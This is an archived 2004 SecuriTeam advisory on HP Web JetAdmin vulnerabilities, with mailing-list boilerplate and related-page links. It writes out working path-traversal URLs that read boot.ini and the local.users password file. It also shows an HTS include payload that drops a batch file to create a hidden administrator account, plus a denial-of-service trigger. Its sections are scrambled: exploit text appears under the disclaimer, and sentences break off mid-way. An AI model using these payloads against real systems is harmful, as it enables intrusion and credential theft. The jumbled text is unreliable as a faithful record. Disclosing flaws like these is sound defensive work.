[NEWS] Multiple HP Web JetAdmin Vulnerabilities (DoS, Upload, Write, Read, Command Execution)
From: SecuriTeam (support_at_securiteam.com)
Date: 03/31/04
- Previous message: SecuriTeam: "[UNIX] Nstxd Security Vulnerability (DoS)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 31 Mar 2004 11:50:18 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Multiple HP Web JetAdmin Vulnerabilities (DoS, Upload, Write, Read,
Command Execution)
------------------------------------------------------------------------
SUMMARY
If an Administrator has not set a password in the HP Web JetAdmin product
all of these actions can be taken by anyone who can access the HTTP
server, Denial of Service, Upload Any file to the filesystem to a known
location, Write to any file on the file system, Read any file from the
filesystem.
HP uses a modified version of the Apache web server. Only a very few
amount of modules are included with the Apache web server. This service
does run with SYSTEM level privileges. The vulnerability is caused by the
use of the HTS scripting language, which is what this product is built on.
A number of issues were found to exist in the scripting language and some
of the files that get included with the product.
DETAILS
Vulnerable Systems:
* HP Web JetAdmin version 7.5.2546 and prior
1. Remote file upload (Any file with any extension)
2. File reading vulnerability as well as HTS script injection
Example:
Using the setinfo.hts script and uploading a custom "hts" include file
[=__installdir C:\Documents and Settings\Administrator\Start
Since this service runs with SYSTEM we can write files anywhere. Now we
Another issue identified is a Denial of Service due to a bad call
The hpwebjetd crashes due to an invalid read, it is believed this is due
3. Denial of Service
For instance /plugins/hpjfpmui/script/wja_update_product.hts:
<FORM onsubmit="return VerifyUpload(this)" action=wja_update_product.hts
4. Command Execution
Workarounds:
This folder is located (on a default install):
ADDITIONAL INFORMATION
The information has been provided by <mailto:wirepair@roguemail.net>
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
====================
DISCLAIMER:
Using the /plugins/hpjwja/script/devices_update_printer_fw_upload.hts HTS
script, any file may be uploaded to:
https://victim:8443/plugins/hpjwja/firmware/printer/
Luckily these directories do not have execute permissions but, this
script, used in conjunction with other vulnerable files allow us to use
the directory (and files contained within) as an 'include' directory.
Submitting the following URL:
https://victim:8443/plugins/hpjdwm/script/test/setinfo.hts?setinclude=../../../../../../../boot.ini allows access to the file that resides outside the bounding HTML root directory as no checks are done to verify if the user is allowed to access the file. An 'authenticated' user who was not the admin account on the Jet Admin service could use this setinfo.hts script to read the local.users file and gain the encrypted passwords of all users which have a password set for the Jet Admin application.
Using the following URL:
https://victim:8443/plugins/hpjdwm/script/test/setinfo.hts?setinclude=../../../../../auth/local.users, a malicious user could then use john the ripper or another password cracker to crack the htpasswd file.
such as:
https://victim:8443/plugins/hpjdwm/script/test/setinfo.hts?setinclude=../../../hpjwja/firmware/printer/test.inc, an attacker can cause the setinfo script to execute the included hts code. This includes writing to ANY file on the host running the Jet Admin service. An example include file test.inc file containing the WriteToFile syntax:
[=test net user heh h0h0h0 /add
net localgroup Administrators heh /add
=]
Menu\Programs\Startup=]
[[httpd:WriteToFile([$__installdir$]/[#test.bat#],[$test$])]]
can create files in the Administrators startup folder. Like say creating a
batch script to add another administrator user. If IIS is installed this
can be used to gain a interactive shell (/scripts or /msadc, or just write
ASP scripts).
tostricmp. If in our include file we use this following line:
[=dir C:\test=]
[[httpd:RemoveCacheFiles($dir$)]]
to a bad call to the stricmp not expecting a second $ at the end of the
dir variable.
Oddly enough this DoS vulnerability can be exploited without being set in
an include file. Using a tool to modify HTTP variables we can cause the
hpwebjetd.exe service to fail by removing a obj=<validcall> that comes
with the [[httpd:RemoveCacheFiles($dir$)]] variable.
(Changed the value of obj to our DoS function)
method=post encType=multipart/form-data>
<INPUT type=hidden value=[[httpd:RemoveCacheFiles($dir$)]] name=obj>
<INPUT type=hidden value=true name=__save>
<INPUT type=hidden value=0 name=packageCount>
<INPUT type=hidden value=blah.fpm name=goodFilename>
The following HTTP request would result in a user account being created
once the server is restarted.
https://
First and foremost, HP has included a number of different methods of
securing this web application. Anyone who uses this product should first
set passwords for the service during setup. Secondly they provide
mechanisms to lock down access certain IP Addresses, this feature should
also be used, how often do you need to manage this from a machine other
than your desktop? Once these are put in place, the only real security
issues are if 'printer users' are configured and accessed by people other
than Administrators. HP recommends also deleting the "test" directory.
C:\Program Files\HP Web Jetadmin\doc\plugins\hpjdwm\script\<test>
wirepair and <mailto:sflist@digitaloffense.net> H D Moore.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
Relevant Pages
... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Phorum is "an Open Source web based discussion ... An XSS vulnerability exists in the script 'common.php' that allows ... By sending a HTTP/POST variable to any Phorum script, ...
(Securiteam)
... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... There is a Cross-Site-Scripting vulnerability in the script ... Another SQL-Injection vulnerability exists in the comments.php script, ... This string manipulates the SQL query into looking something like this: ...
(Securiteam)
... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... based on PHP and the Horde Framework." ... Horde is subject to a client side script injection vulnerability in the ...
(Securiteam)
... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... any HTML or script code can be injected. ... * Another XSS vulnerability can be found in the signup.php script (ex.: ... there is also a remote PHP code execution in the system. ...
(Securiteam)
... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Everywhere NR041 Cable/DSL 4-port router "connects multiple PCs to your ... malicious script code can be ... The code for such an HTML file is ...
(Securiteam)
